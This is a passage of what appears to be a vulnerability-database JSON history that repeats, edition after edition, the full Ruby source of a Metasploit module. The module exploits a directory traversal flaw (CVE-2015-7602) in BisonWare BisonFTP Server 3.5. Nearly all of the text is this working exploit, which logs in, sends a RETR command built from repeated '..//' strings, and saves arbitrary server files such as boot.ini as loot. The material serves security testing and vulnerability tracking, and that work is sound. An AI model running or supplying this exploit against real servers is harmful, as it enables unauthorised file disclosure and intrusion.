/BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T15:56:21", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T17:50:51", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T17:50:51", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T17:50:51", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-03-26T21:50:59", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-03-26T21:50:59", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-03-26T21:50:59", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-07T22:12:56", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-07T22:12:56", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-07T22:12:56", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-08T00:12:12", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-08T00:12:12", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T08:27:52", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T08:27:52", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T10:30:37", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C/"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-04-20T10:30:37", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-04-20T22:29:59", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-04-08T00:12:12", "value": 9.0, "vector": 